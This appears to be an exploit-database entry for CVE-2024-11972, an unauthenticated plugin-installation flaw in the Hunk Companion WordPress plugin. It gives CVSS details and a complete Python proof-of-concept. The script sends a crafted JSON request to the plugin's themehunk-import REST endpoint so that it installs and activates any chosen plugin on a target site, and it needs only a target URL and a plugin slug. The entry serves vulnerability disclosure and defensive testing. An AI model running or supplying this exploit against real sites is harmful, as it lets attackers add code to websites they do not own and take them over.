Hunk Companion Plugin 1.9.0 – Unauthenticated Plugin Installation

Exploit Details

Basic Information

Exploit Title	Hunk Companion Plugin 1.9.0 – Unauthenticated Plugin Installation
Exploit ID	EDB-ID:52259
Type	exploitdb
Published	2025-04-18T00:00:00
Modified	2025-04-18T00:00:00

CVSS Information

CVSS Score	9.8
Severity	CRITICAL
Vector	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE Information

CVE-2024-11972

Exploit Description

Exploit Title: Hunk Companion Plugin 1.9.0 – Unauthenticated Plugin Installation Date: 16 December, 2024 Exploit Author: Jun Takemura Author's GitHub: https://github.com/JunTakemura Author's Blog: juntakemura.dev Vendor…

Exploit Code

# Exploit Title: Hunk Companion Plugin 1.9.0 – Unauthenticated Plugin Installation

# Date: 16 December, 2024

# Exploit Author: Jun Takemura

# Author’s GitHub: https://github.com/JunTakemura

# Author’s Blog: juntakemura.dev

# Vendor Homepage: https://themehunk.com

# Software Link: https://wordpress.org/plugins/hunk-companion/

# Version: Tested on Hunk Companion 1.8.8

# CVE: CVE-2024-11972

# Vulnerability Description:

#     Exploits a flaw in the Hunk Companion plugin’s permission_callback for the

#     /wp-json/hc/v1/themehunk-import endpoint, allowing unauthenticated attackers

#     to install and activate arbitrary plugins from the WordPress.org repository.

# Tested on: Ubuntu

# Original vulnerability discovered by: Daniel Rodriguez

#

# Usage:

#     1. Update `target_url` below with the target WordPress site’s URL.

#     2. Update `plugin_name` with the slug of the plugin you want to install.

#     3. Run: python3 exploit.py

#

import requests

from urllib.parse import urljoin
# Update ‘URL’ with your target WordPress site URL, for example “http://localhost/wordpress”

target_url = “URL”
# Update ‘NAME’ with desired plugin’s name (slug), for example “wp-query-console”

plugin_name = “NAME”
endpoint = “/wp-json/hc/v1/themehunk-import”

url = urljoin(target_url, endpoint)
payload = {

    “params”: {

        “plugin”: {

            plugin_name: “Plugin Label”

        },

        “allPlugins”: [

            {

                plugin_name: f”{plugin_name}/{plugin_name}.php”

            }

        ],

        “themeSlug”: “theme”,

        “proThemePlugin”: “plugin”,

        “templateType”: “free”,

        “tmplFreePro”: “theme”,

        “wpUrl”: target_url

    }

}
headers = {

    “User-Agent”: “Mozilla/5.0 (Windows NT 6.1; WOW64)”,

    “Content-Type”: “application/json”

}
try:

    response = requests.post(url, json=payload, headers=headers, timeout=10)

    response.raise_for_status()  # Raises an HTTPError if the response is not 2xx
    print(f”[+] Exploit sent successfully.”)

    print(f”Response Status Code: {response.status_code}”)

    print(f”Response Body: {response.text}”)

except requests.exceptions.RequestException as e:

    print(f”[-] Request failed: {e}”)

View Full Exploit Details